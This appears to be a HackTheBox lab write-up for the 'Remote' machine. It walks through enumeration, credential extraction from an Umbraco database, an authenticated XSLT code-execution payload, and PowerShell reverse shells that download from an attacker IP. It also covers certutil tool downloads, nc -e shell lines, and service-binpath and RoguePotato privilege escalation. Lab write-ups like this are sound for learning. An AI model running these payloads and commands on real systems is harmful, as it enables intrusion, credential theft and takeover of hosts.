HackTheBox - Remote

Nmap scan results

nmap -p- -A -T4 -oA nmap-remote 10.10.10.180

Let's enumerate the FTP Server and see if we can get any sensitive/conf files.

Epic Fail

Enumerating webserver (Microsoft HTTPAPI)

There's a Umbraco CMS (Content Management System) running and we can search for potential exploits, but first we will run a gobuster scan in the background.

Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50

There are certain exploits available for this CMS but we need to enumerate the version used.

Mounting the NFS Share

NFS, or Network File System, is a collaboration system developed by Sun Microsystems in the early 80s that allows users to view, store, update or share files on a remote computer as though it was a local computer.

mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock

So the configuration file for Umbraco CMS is stored in Umbraco.sdf file which contains the usernames and passwords. The file is located at App_data/Umbraco.sdf

I actually ran strings on Umbraco.sdf file to get the credentials for admin. We will also need to verify the version used. Check Web.config file

Get the SHA-1 hash for admin and crack it using John or hashcat.

Now that we have credentials, we can try to exploit that (Authenticated) Remote Code Execution

Exploiting Umbraco's RCE (Authenticated)

This is the vulnerable page at http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml() 
    { 
        string cmd = "<cmd-arguments>"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "<cmd>"; 
        proc.StartInfo.Arguments = cmd; 
        proc.StartInfo.UseShellExecute = false; 
        proc.StartInfo.RedirectStandardOutput = true;  
        proc.Start(); string output = proc.StandardOutput.ReadToEnd(); 
        return output;
     }  
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> 
 </xsl:template> </xsl:stylesheet>

Using nishang's powershell script to get a reverse shell

python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"

Running winpeas.exe (Privilege Escalation)

certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe

If the group "Authenticated users" has SERVICE_ALL_ACCESS in a service, then it can modify the binary that is being executed by the service. To modify it and execute nc you can do:

Windows Local Privilege EscalationHackTricks

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0

sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AY
QBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc

Trying Rogue Potato Attack

Potatoes - Windows Privilege Escalation · Jorge Lajara

Download the exploit from here and transfer it to the target machine using certutil.exe

certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe

The exploit doesn't work without providing CLSID, we can get CLSID for UsoSvc service from here.

A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.

.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"